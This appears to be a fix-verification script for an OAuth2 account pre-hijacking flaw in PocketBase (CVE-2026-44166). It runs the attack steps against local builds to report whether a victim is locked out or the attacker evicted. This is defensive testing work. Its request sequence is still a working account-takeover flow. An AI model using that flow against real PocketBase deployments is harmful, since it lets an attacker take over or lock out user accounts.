README.md
Rendering markdown...
"""verify_fix.py -- fix-verification harness for CVE-2026-44166.
Runs the same pre-hijacking scenario against any PocketBase build and reports the
outcome (attacker locked the victim out, or the victim's login evicted the attacker).
Usage: python verify_fix.py 0.37.4 # patched -> attacker evicted
python verify_fix.py 0.37.3 # vulnerable -> victim locked out
For the verbatim exploit as originally reported, see poc.py.
"""
import subprocess, time, shutil, os, json, sys
import urllib.request, urllib.error
import mock_oauth2_server
VER = sys.argv[1] if len(sys.argv) > 1 else "0.37.4"
mock_oauth2_server.start()
time.sleep(0.3)
PB_EXE = "pocketbase.exe" if os.name == "nt" else "pocketbase"
PB_BIN = os.path.join(os.path.dirname(__file__), f"bin_{VER}", PB_EXE)
PB_DATA = os.path.join(os.path.dirname(__file__), f"pb_data_{VER}")
if os.path.exists(PB_DATA): shutil.rmtree(PB_DATA)
subprocess.run([PB_BIN, "superuser", "upsert", "[email protected]", "Admin1234!", f"--dir={PB_DATA}"], check=True, capture_output=True)
pb = subprocess.Popen([PB_BIN, "serve", "--http=127.0.0.1:8090", f"--dir={PB_DATA}", "--automigrate=false"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(3)
def api(method, path, body=None, token=None, soft=False):
req = urllib.request.Request("http://127.0.0.1:8090" + path,
json.dumps(body).encode() if body else None,
{"Content-Type": "application/json", **({"Authorization": f"Bearer {token}"} if token else {})}, method=method)
try:
with urllib.request.urlopen(req) as r: return json.loads(r.read())
except urllib.error.HTTPError as e:
b = e.read().decode()
if soft: return {"_err": e.code, "_body": b}
raise RuntimeError(f"HTTP {e.code}: {b}")
print(f"=== Testing PocketBase {VER} ===")
try:
admin_tok = api("POST", "/api/collections/_superusers/auth-with-password",
{"identity": "[email protected]", "password": "Admin1234!"})["token"]
api("POST", "/api/collections", {
"name": "members", "type": "auth", "createRule": "",
"oauth2": {"enabled": True, "providers": [{
"name": "oidc", "clientId": "x", "clientSecret": "x",
"authURL": "http://127.0.0.1:8089/authorize",
"tokenURL": "http://127.0.0.1:8089/token",
"userInfoURL": "http://127.0.0.1:8089/userinfo", "pkce": False}]}
}, admin_tok)
r1 = api("POST", "/api/collections/members/auth-with-oauth2", {
"provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost",
"createData": {"email": "[email protected]"}})
print(f"[1] Attacker pre-claims: email={r1['record']['email']} verified={r1['record']['verified']} id={r1['record']['id']}")
r2 = api("POST", "/api/collections/members/auth-with-oauth2", {
"provider": "oidc", "code": "victim_code", "redirectURL": "http://localhost"}, soft=True)
if "_err" in r2:
print(f"[2] Victim login: HTTP {r2['_err']} -- {json.loads(r2['_body']).get('message')} => LOCKED OUT")
victim_id = None
else:
victim_id = r2['record']['id']
print(f"[2] Victim login: SUCCESS verified={r2['record']['verified']} id={victim_id} => victim owns the account")
r3 = api("POST", "/api/collections/members/auth-with-oauth2", {
"provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost"}, soft=True)
if "_err" in r3:
print(f"[3] Attacker re-auth: HTTP {r3['_err']} -- {json.loads(r3['_body']).get('message')} => attacker evicted")
else:
same = (victim_id is not None and r3['record']['id'] == victim_id)
print(f"[3] Attacker re-auth: email={r3['record']['email']} id={r3['record']['id']} same-as-victim={same}")
finally:
pb.terminate()